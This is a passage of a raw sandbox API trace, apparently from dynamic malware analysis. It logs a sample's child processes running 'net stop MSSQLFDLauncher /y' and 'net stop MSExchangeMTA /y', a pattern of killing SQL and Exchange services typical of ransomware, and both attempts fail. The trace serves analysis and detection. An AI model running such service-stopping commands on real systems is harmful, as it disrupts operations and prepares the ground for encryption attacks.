"32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 498 os_tid = 0xab4 [0214.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fc3c | out: lpSystemTimeAsFileTime=0x13fc3c*(dwLowDateTime=0x48c01860, dwHighDateTime=0x1d57a87)) [0214.007] GetCurrentProcessId () returned 0x498 [0214.007] GetCurrentThreadId () returned 0xab4 [0214.007] GetTickCount () returned 0x116f113 [0214.007] QueryPerformanceCounter (in: lpPerformanceCount=0x13fc34 | out: lpPerformanceCount=0x13fc34*=33429147174) returned 1 [0214.007] GetModuleHandleA (lpModuleName=0x0) returned 0x2f0000 [0214.007] __set_app_type (_Type=0x1) [0214.007] __p__fmode () returned 0x74eb31f4 [0214.007] __p__commode () returned 0x74eb31fc [0214.007] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2fffe6) returned 0x0 [0214.008] __getmainargs (in: _Argc=0x309064, _Argv=0x30906c, _Env=0x309068, _DoWildCard=0, _StartInfo=0x309024 | out: _Argc=0x309064, _Argv=0x30906c, _Env=0x309068) returned 0 [0214.008] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.008] GetConsoleOutputCP () returned 0x1b5 [0214.008] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x309080 | out: lpCPInfo=0x309080) returned 1 [0214.008] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.011] sprintf_s (in: _DstBuf=0x13fbf4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0214.011] setlocale (category=0, locale=".437") returned="English_United States.437" [0214.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0214.013] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0214.013] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher /y" [0214.013] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13f9c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0214.013] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x72) returned 0x36f788 [0214.013] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0214.014] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fbc4 | out: Buffer=0x13fbc4*=0x371c78) returned 0x0 [0214.014] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fbc4 | out: Buffer=0x13fbc4*=0x371c90) returned 0x0 [0214.014] _fileno (_File=0x74eb2900) returned -2 [0214.014] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0214.014] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0214.014] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0214.014] _wcsicmp (_String1="config", _String2="stop") returned -16 [0214.014] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0214.014] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0214.014] _wcsicmp (_String1="file", _String2="stop") returned -13 [0214.014] _wcsicmp (_String1="files", _String2="stop") returned -13 [0214.014] _wcsicmp (_String1="group", _String2="stop") returned -12 [0214.014] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0214.014] _wcsicmp (_String1="help", _String2="stop") returned -11 [0214.014] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0214.014] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0214.014] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0214.014] _wcsicmp (_String1="session", _String2="stop") returned -15 [0214.014] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0214.014] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0214.014] _wcsicmp (_String1="share", _String2="stop") returned -12 [0214.014] _wcsicmp (_String1="start", _String2="stop") returned -14 [0214.014] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0214.014] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0214.014] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0214.014] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher") returned -12 [0214.014] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher") returned -10 [0214.014] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher") returned -10 [0214.014] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher") returned -10 [0214.014] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher") returned -10 [0214.014] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher") returned -7 [0214.014] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher") returned -7 [0214.014] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher") returned -6 [0214.015] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher") returned -6 [0214.015] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher") returned -5 [0214.015] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher") returned -5 [0214.015] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher") returned -1 [0214.015] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher") returned 3 [0214.015] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher") returned 7 [0214.015] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher") returned 8 [0214.015] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher") returned 8 [0214.015] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher") returned -12 [0214.015] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher") returned -14 [0214.015] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher") returned 5 [0214.015] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher") returned 5 [0214.015] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher") returned 1 [0214.015] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher") returned 5 [0214.015] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher") returned 5 [0214.015] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher") returned 5 [0214.015] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher") returned 10 [0214.015] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher") returned 10 [0214.015] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher") returned 10 [0214.015] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher") returned 3 [0214.015] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher") returned -9 [0214.015] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher") returned -1 [0214.015] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher") returned 6 [0214.015] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher") returned -1 [0214.015] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher") returned -12 [0214.015] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher") returned 1 [0214.016] _wcsupr (in: _String="MSSQLFDLauncher" | out: _String="MSSQLFDLAUNCHER") returned="MSSQLFDLAUNCHER" [0214.016] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x375460 [0214.019] GetServiceKeyNameW (in: hSCManager=0x375460, lpDisplayName="MSSQLFDLAUNCHER", lpServiceName=0x30aaf0, lpcchBuffer=0x13fb60 | out: lpServiceName="", lpcchBuffer=0x13fb60) returned 0 [0214.019] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER") returned -12 [0214.019] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER") returned -14 [0214.019] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER") returned 5 [0214.019] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER") returned 5 [0214.019] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER") returned 5 [0214.019] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER") returned 5 [0214.019] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER") returned 5 [0214.020] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER") returned 10 [0214.020] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER") returned 10 [0214.020] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER") returned 10 [0214.020] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER") returned 3 [0214.020] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER") returned -9 [0214.020] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER") returned -1 [0214.020] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER") returned 6 [0214.020] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER") returned 6 [0214.020] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER") returned 6 [0214.020] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER") returned -1 [0214.020] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER") returned -12 [0214.020] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER") returned 1 [0214.020] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER", opcode=0x0, arg=0x0, bufptr=0x13fb5c | out: bufptr=0x13fb5c) returned 0x889 [0214.021] wcscpy_s (in: _Destination=0x30a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0214.021] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0214.021] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x30b338, nSize=0x800, Arguments=0x309dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0214.023] GetFileType (hFile=0x26c) returned 0x3 [0214.023] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x373f90 [0214.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x373f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0214.023] WriteFile (in: hFile=0x26c, lpBuffer=0x373f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x13fa9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fa9c, lpOverlapped=0x0) returned 0 [0214.023] LocalFree (hMem=0x373f90) returned 0x0 [0214.023] GetFileType (hFile=0x26c) returned 0x3 [0214.023] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x376238 [0214.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x376238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n7", lpUsedDefaultChar=0x0) returned 2 [0214.023] WriteFile (in: hFile=0x26c, lpBuffer=0x376238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fa9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fa9c, lpOverlapped=0x0) returned 0 [0214.023] LocalFree (hMem=0x376238) returned 0x0 [0214.023] _ultow (in: _Dest=0x889, _Radix=1309388 | out: _Dest=0x889) returned="2185" [0214.023] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x30b338, nSize=0x800, Arguments=0x309dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0214.023] GetFileType (hFile=0x26c) returned 0x3 [0214.023] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x376238 [0214.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x376238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0214.023] WriteFile (in: hFile=0x26c, lpBuffer=0x376238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x13faa8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13faa8, lpOverlapped=0x0) returned 0 [0214.023] LocalFree (hMem=0x376238) returned 0x0 [0214.023] GetFileType (hFile=0x26c) returned 0x3 [0214.023] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x376238 [0214.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x376238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n7", lpUsedDefaultChar=0x0) returned 2 [0214.023] WriteFile (in: hFile=0x26c, lpBuffer=0x376238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13faa8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13faa8, lpOverlapped=0x0) returned 0 [0214.023] LocalFree (hMem=0x376238) returned 0x0 [0214.024] NetApiBufferFree (Buffer=0x371c78) returned 0x0 [0214.024] NetApiBufferFree (Buffer=0x371c90) returned 0x0 [0214.024] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher /y" [0214.024] exit (_Code=2) Process: id = "326" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x797f3000" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSExchangeMTA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 499 os_tid = 0xb60 Process: id = "327" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x480c6000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "326" os_parent_pid = "0xb88" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMTA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 500 os_tid = 0x7b0 [0214.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfe60 | out: lpSystemTimeAsFileTime=0x2bfe60*(dwLowDateTime=0x48da4780, dwHighDateTime=0x1d57a87)) [0214.176] GetCurrentProcessId () returned 0xb54 [0214.176] GetCurrentThreadId () returned 0x7b0 [0214.176] GetTickCount () returned 0x116f1bf [0214.176] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfe58 | out: lpPerformanceCount=0x2bfe58*=33446083777) returned 1 [0214.176] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0214.176] __set_app_type (_Type=0x1) [0214.177] __p__fmode () returned 0x74eb31f4 [0214.177] __p__commode () returned 0x74eb31fc [0214.177] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8ffe6) returned 0x0 [0214.177] __getmainargs (in: _Argc=0x99064, _Argv=0x9906c, _Env=0x99068, _DoWildCard=0, _StartInfo=0x99024 | out: _Argc=0x99064, _Argv=0x9906c, _Env=0x99068) returned 0 [0214.177] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.177] GetConsoleOutputCP () returned 0x1b5 [0214.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x99080 | out: lpCPInfo=0x99080) returned 1 [0214.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.180] sprintf_s (in: _DstBuf=0x2bfe18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0214.180] setlocale (category=0, locale=".437") returned="English_United States.437" [0214.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0214.183] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0214.183] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMTA /y" [0214.183] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bfbe4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0214.183] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x6e) returned 0x373c10 [0214.183] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0214.183] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfde8 | out: Buffer=0x2bfde8*=0x371c70) returned 0x0 [0214.183] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfde8 | out: Buffer=0x2bfde8*=0x371c88) returned 0x0 [0214.183] _fileno (_File=0x74eb2900) returned -2 [0214.183] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0214.183] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0214.183] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0214.183] _wcsicmp (_String1="config", _String2="stop") returned -16 [0214.184] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0214.184] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0214.184] _wcsicmp (_String1="file", _String2="stop") returned -13 [0214.184] _wcsicmp (_String1="files", _String2="stop") returned -13 [0214.184] _wcsicmp (_String1="group", _String2="stop") returned -12 [0214.184] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0214.184] _wcsicmp (_String1="help", _String2="stop") returned -11 [0214.184] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0214.184] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0214.184] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0214.184] _wcsicmp (_String1="session", _String2="stop") returned -15 [0214.184] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0214.184] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0214.184] _wcsicmp (_String1="share", _String2="stop") returned -12 [0214.184] _wcsicmp (_String1="start", _String2="stop") returned -14 [0214.184] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0214.184] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0214.184] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0214.184] _wcsicmp (_String1="accounts", _String2="MSExchangeMTA") returned -12 [0214.184] _wcsicmp (_String1="computer", _String2="MSExchangeMTA") returned -10 [0214.184] _wcsicmp (_String1="config", _String2="MSExchangeMTA") returned -10 [0214.184] _wcsicmp (_String1="continue", _String2="MSExchangeMTA") returned -10 [0214.184] _wcsicmp (_String1="cont", _String2="MSExchangeMTA") returned -10 [0214.184] _wcsicmp (_String1="file", _String2="MSExchangeMTA") returned -7 [0214.184] _wcsicmp (_String1="files", _String2="MSExchangeMTA") returned -7 [0214.184] _wcsicmp (_String1="group", _String2="MSExchangeMTA") returned -6 [0214.184] _wcsicmp (_String1="groups", _String2="MSExchangeMTA") returned -6 [0214.184] _wcsicmp (_String1="help", _String2="MSExchangeMTA") returned -5 [0214.184] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMTA") returned -5 [0214.184] _wcsicmp (_String1="localgroup", _String2="MSExchangeMTA") returned -1 [0214.184] _wcsicmp (_String1="pause", _String2="MSExchangeMTA") returned 3 [0214.184] _wcsicmp (_String1="session", _String2="MSExchangeMTA") returned 6 [0214.184] _wcsicmp (_String1="sessions", _String2="MSExchangeMTA") returned 6 [0214.184] _wcsicmp (_String1="sess", _String2="MSExchangeMTA") returned 6 [0214.184] _wcsicmp (_String1="share", _String2="MSExchangeMTA") returned 6 [0214.184] _wcsicmp (_String1="start", _String2="MSExchangeMTA") returned 6 [0214.184] _wcsicmp (_String1="stats", _String2="MSExchangeMTA") returned 6 [0214.184] _wcsicmp (_String1="statistics", _String2="MSExchangeMTA") returned 6 [0214.185] _wcsicmp (_String1="stop", _String2="MSExchangeMTA") returned 6 [0214.185] _wcsicmp (_String1="time", _String2="MSExchangeMTA") returned 7 [0214.185] _wcsicmp (_String1="user", _String2="MSExchangeMTA") returned 8 [0214.185] _wcsicmp (_String1="users", _String2="MSExchangeMTA") returned 8 [0214.185] _wcsicmp (_String1="msg", _String2="MSExchangeMTA") returned 2 [0214.185] _wcsicmp (_String1="messenger", _String2="MSExchangeMTA") returned -14 [0214.185] _wcsicmp (_String1="receiver", _String2="MSExchangeMTA") returned 5 [0214.185] _wcsicmp (_String1="rcv", _String2="MSExchangeMTA") returned 5 [0214.185] _wcsicmp (_String1="netpopup", _String2="MSExchangeMTA") returned 1 [0214.185] _wcsicmp (_String1="redirector", _String2="MSExchangeMTA") returned 5 [0214.185] _wcsicmp (_String1="redir", _String2="MSExchangeMTA") returned 5 [0214.185] _wcsicmp (_String1="rdr", _String2="MSExchangeMTA") returned 5 [0214.185] _wcsicmp (_String1="workstation", _String2="MSExchangeMTA") returned 10 [0214.185] _wcsicmp (_String1="work", _String2="MSExchangeMTA") returned 10 [0214.185] _wcsicmp (_String1="wksta", _String2="MSExchangeMTA") returned 10 [0214.185] _wcsicmp (_String1="prdr", _String2="MSExchangeMTA") returned 3 [0214.185] _wcsicmp (_String1="devrdr", _String2="MSExchangeMTA") returned -9 [0214.185] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMTA") returned -1 [0214.185] _wcsicmp (_String1="server", _String2="MSExchangeMTA") returned 6 [0214.185] _wcsicmp (_String1="svr", _String2="MSExchangeMTA") returned 6 [0214.185] _wcsicmp (_String1="srv", _String2="MSExchangeMTA") returned 6 [0214.185] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMTA") returned -1 [0214.185] _wcsicmp (_String1="alerter", _String2="MSExchangeMTA") returned -12 [0214.185] _wcsicmp (_String1="netlogon", _String2="MSExchangeMTA") returned 1 [0214.185] _wcsupr (in: _String="MSExchangeMTA" | out: _String="MSEXCHANGEMTA") returned="MSEXCHANGEMTA" [0214.185] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3754d0 [0214.188] GetServiceKeyNameW (in: hSCManager=0x3754d0, lpDisplayName="MSEXCHANGEMTA", lpServiceName=0x9aaf0, lpcchBuffer=0x2bfd84 | out: lpServiceName="", lpcchBuffer=0x2bfd84) returned 0 [0214.188] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMTA") returned 2 [0214.188] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMTA") returned -14 [0214.189] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMTA") returned 5 [0214.189] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMTA") returned 5 [0214.189] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMTA") returned 5 [0214.189] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMTA") returned 5 [0214.189] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMTA") returned 5 [0214.189] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMTA") returned 10 [0214.189] _wcsicmp (_String1="work", _String2="MSEXCHANGEMTA") returned 10 [0214.189] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMTA") returned 10 [0214.189] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMTA") returned 3 [0214.189] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMTA") returned -9 [0214.189] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMTA") returned -1 [0214.189] _wcsicmp (_String1="server", _String2="MSEXCHANGEMTA") returned 6 [0214.189] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMTA") returned 6 [0214.189] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMTA") returned 6 [0214.189] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMTA") returned -1 [0214.189] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMTA") returned -12 [0214.189] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMTA") returned 1 [0214.189] NetServiceControl (in: servername=0x0, service="MSEXCHANGEMTA", opcode=0x0, arg=0x0, bufptr=0x2bfd80 | out: bufptr=0x2bfd80) returned 0x889 [0214.190] wcscpy_s (in: _Destination=0x9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0214.190] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0214.191] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x9b338, nSize=0x800, Arguments=0x99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0214.192] GetFileType (hFile=0x26c) returned 0x3 [0214.192] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x374000 [0214.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x374000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0214.193] WriteFile (in: hFile=0x26c, lpBuffer=0x374000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bfcc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfcc0, lpOverlapped=0x0) returned 0 [0214.193] LocalFree (hMem=0x374000) returned 0x0 [0214.193] GetFileType (hFile=0x26c) returned 0x3 [0214.193] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3762a8 [0214.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3762a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n7", lpUsedDefaultChar=0x0) returned 2 [0214.193] WriteFile (in: hFile=0x26c, lpBuffer=0x3762a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfcc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfcc0, lpOverlapped=0x0) returned 0 [0214.193] LocalFree (hMem=0x3762a8) returned 0x0 [0214.193] _ultow (in: _Dest=0x889, _Radix=2882800 | out: _Dest=0x889) returned="2185" [0214.193] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9b338, nSize=0x800, Arguments=0x99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0214.193] GetFileType (hFile=0x26c) returned 0x3 [0214.193] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3762a8 [0214.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3762a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0214.193] WriteFile (in: hFile=0x26c, 